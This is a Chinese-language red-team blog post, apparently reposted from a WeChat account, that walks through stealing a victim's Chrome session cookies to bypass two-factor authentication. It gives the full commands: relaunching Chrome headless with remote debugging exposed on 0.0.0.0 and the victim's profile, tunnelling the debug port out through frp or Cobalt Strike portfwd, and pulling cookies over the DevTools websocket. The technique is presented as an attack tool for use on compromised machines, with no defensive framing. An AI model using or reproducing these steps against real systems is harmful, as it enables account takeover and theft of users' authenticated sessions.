谷歌调试模式:绕过2FA认证的秘密武器

admin 2024年8月20日08:30:17评论19 views字数 1286阅读4分17秒阅读模式

 

如果您窃取某人的 Chrome cookie,您就可以在他们登录的每个网站上登录他们的帐户。

通常您需要用户密码才能执行此操作,但我找到了一种无需密码即可执行此操作的方法。您只需要能够在他们的计算机上执行代码即可。它通过使用 Chrome 的远程调试协议来工作.

实验环境

cobalt strike

被控制端

chrome

frp

第一步先把对方的chrome关闭掉,然后被控机器运行下面代码

"C:Progra~2GoogleChromeApplicationchrome.exe" --remote-debugging-port=9222 --headless --user-data-dir=C:UsersAdministratorAppDataLocalGoogleChromeUSERDA~1 -remote-debugging-addres=0.0.0.0 --ignore-certificate-errors

谷歌调试模式:绕过2FA认证的秘密武器

 然后使用转发工具frp,你可以用其他工具进行转发。(lcx会卡死,使用frp)

服务器frp配置

[common]bind_port = 52080

客户端配置

[common]server_addr = xx.xxx.xxx.xxx     server_port = 53080         
[ssh]                       type = tcp                  local_ip = 127.0.0.1       local_port = 9222          remote_port = 9221

受害机9222端口转发到9221端口上

本地打开谷歌浏览器输入

chrome://inspect/#devices

谷歌调试模式:绕过2FA认证的秘密武器

点击 Configure,设置监听的端口,这里我选择的是 9221,然后点击 Done

谷歌调试模式:绕过2FA认证的秘密武器

如果对方访问网页,就能在这里看到访问的所有网页:

谷歌调试模式:绕过2FA认证的秘密武器

Slive 方法

上线开启谷歌浏览器调试模式

execute -P 2184 "c:Program FilesGoogleChromeApplicationchrome.exe" --remote-debugging-port=9222 --headless  --user-data-dir=C:UsersAdministratorAppDataLocalGoogleChromeUSERDA~1

端口转发

portfwd add -r 127.0.0.0:9222

谷歌调试模式:绕过2FA认证的秘密武器

将Chrome通过隧道连接

curl http://localhost:8080/jso

使用websocket 请求获取到的值

wsc ws://localhost:8080/devtools/page/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx

谷歌调试模式:绕过2FA认证的秘密武器

使用窃取的cookie凭证访问Web应用程序

谷歌调试模式:绕过2FA认证的秘密武器

注意:无论是否设置了双因素身份验证(在这里已启用),Cookie都可以提供访问权限。

参考

https://mango.pdf.zone/stealing-chrome-cookies-without-a-password?fbclid=IwAR1oj04BnnHXbXNFfnsZsQT34cdClcEDceUBPDW-0NlYTKQUjPyKRv-_86A

 

原文始发于微信公众号(红队笔记录):谷歌调试模式:绕过2FA认证的秘密武器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月20日08:30:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   谷歌调试模式:绕过2FA认证的秘密武器http://cn-sec.com/archives/1996297.html

发表评论

匿名网友 填写信息